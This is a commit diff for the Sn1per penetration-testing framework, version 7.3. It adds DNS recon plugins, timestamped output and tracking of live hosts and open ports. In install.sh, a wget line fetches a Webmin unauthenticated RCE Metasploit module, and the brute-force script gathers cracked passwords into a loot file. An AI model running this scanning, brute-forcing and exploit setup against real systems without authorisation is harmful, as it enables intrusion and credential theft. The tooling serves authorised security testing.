mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
a13d04e7c4
commit
a1c3419dc1
12
CHANGELOG.md
12
CHANGELOG.md
|
|
@ -1,4 +1,16 @@
|
|||
## CHANGELOG:
|
||||
* v7.3 - Added CVE-2019-15107 Webmin <= 1.920 - Unauthenticated RCE MSF exploit
|
||||
* v7.3 - Added massdns plugin
|
||||
* v7.3 - Added altdns plugin
|
||||
* v7.3 - Added dnsgen plugin
|
||||
* v7.3 - Updated web file/dir wordlists from public exploits and honeypots
|
||||
* v7.3 - Added time stamps to all commands
|
||||
* v7.3 - Removed CloudFront from domain hijacking checks
|
||||
* v7.3 - Removed snmp-brute.nse script due to scan issues
|
||||
* v7.3 - Fixed issue with discover scan workspace names
|
||||
* v7.3 - Fixed issue with DockerFile (sed: can't read /usr/bin/msfdb: No such file or directory)
|
||||
* v7.3 - Fixed issue with installer on docker not having pip installed
|
||||
* v7.3 - Fixed issue with port 161 not being referenced correctly in scans
|
||||
* v7.2 - Added experimental OpenVAS API integration
|
||||
* v7.2 - Improved Burpsuite 2.x API integration with vuln reporting
|
||||
* v7.2 - Added hunter.io API integration to recon mode scans
|
||||
|
|
|
|||
10
install.sh
10
install.sh
|
|
@ -83,6 +83,14 @@ git clone https://github.com/rbsec/dnscan.git
|
|||
git clone https://github.com/christophetd/censys-subdomain-finder.git
|
||||
pip install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
git clone https://github.com/infosec-au/altdns.git
|
||||
git clone https://github.com/blechschmidt/massdns.git
|
||||
git clone https://github.com/ProjectAnte/dnsgen
|
||||
cd dnsgen
|
||||
pip3 install -r requirements.txt
|
||||
python3 setup.py install
|
||||
cd ..
|
||||
pip install py-altdns
|
||||
pip3 install webtech
|
||||
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
|
||||
unzip slurp.zip
|
||||
|
|
@ -99,6 +107,8 @@ cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bi
|
|||
cd /usr/share/nmap/scripts/
|
||||
git clone https://github.com/scipag/vulscan
|
||||
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
|
||||
mkdir -p ~/.msf4/modules/exploits/web
|
||||
wget https://raw.githubusercontent.com/1N3/Exploits/master/defcon_webmin_unauth_rce.rb -O ~/.msf4/modules/exploits/web/defcon_webmin_unauth_rce.rb
|
||||
cd $PLUGINS_DIR
|
||||
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
|
||||
mv ~/.sniper.conf ~/.sniper.conf.old 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -23,7 +23,7 @@ if [ "$MODE" = "airstrike" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -1,11 +1,11 @@
|
|||
if [ "$AUTOBRUTE" = "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SKIPPING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
@ -15,6 +15,10 @@ else
|
|||
cd $INSTALL_DIR
|
||||
rm -f hydra.restore
|
||||
rm -f scan.log
|
||||
CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null)
|
||||
if [ ${#CRACKED} -ge 5 ]; then
|
||||
echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo ""
|
||||
if [ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
|
||||
|
|
|
|||
|
|
@ -2,9 +2,10 @@
|
|||
if [ "$MODE" = "discover" ]; then
|
||||
if [ "$REPORT" = "1" ]; then
|
||||
if [ ! -z "$WORKSPACE" ]; then
|
||||
WORKSPACE="$(echo $WORKSPACE | tr / -)"
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/ips 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -39,33 +40,33 @@ if [ "$MODE" = "discover" ]; then
|
|||
echo -e "$OKRED \/$RESET"
|
||||
echo ""
|
||||
OUT_FILE=$(echo $TARGET | tr / -)
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt
|
||||
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -v -p $QUICK_PORTS -sS $TARGET -Pn 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
|
||||
cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -v -p $DEFAULT_UDP_PORTS -sU -Pn $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null
|
||||
cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CURRENT TARGETS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
|
||||
sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
|
||||
cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
|
||||
echo ""
|
||||
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt "
|
||||
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -10,7 +10,7 @@ if [ "$MODE" = "flyover" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -65,7 +65,10 @@ if [ "$MODE" = "flyover" ]; then
|
|||
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
|
||||
|
||||
nmap -sS --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
|
||||
|
||||
WEBHOST=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | egrep "80|443" | grep open | wc -l 2> /dev/null)
|
||||
if [ "$WEBHOST" -gt "0" ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
|
|
@ -77,26 +80,36 @@ if [ "$MODE" = "flyover" ]; then
|
|||
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80 2> /dev/null > /dev/null &
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 2> /dev/null > /dev/null &
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80 2> /dev/null > /dev/null &
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 2> /dev/null > /dev/null &
|
||||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets-all-presorted.txt
|
||||
i=$((i+1))
|
||||
if [ "$i" -gt "$THREADS" ]; then
|
||||
i=1
|
||||
sleep 15
|
||||
fi
|
||||
|
||||
done
|
||||
sleep 15
|
||||
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-sorted.txt
|
||||
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
|
||||
killall webtech 2> /dev/null
|
||||
for TARGET in `cat $LOOT_DIR/domains/targets-all-sorted.txt`; do
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [ ${#HOST_UP} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
done
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -19,6 +19,7 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
args="$args --noreport -m fullportonly"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
|
@ -29,45 +30,58 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
if [ -z "$PORT" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -A -v -sV -sU --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [ ${#HOST_UP} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
|
||||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
fi
|
||||
|
||||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -1,11 +1,11 @@
|
|||
if [ "$FULLNMAPSCAN" = "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
@ -17,12 +17,22 @@ else
|
|||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [ ${#HOST_UP} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ if [ "$MODE" = "massportscan" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
|
|
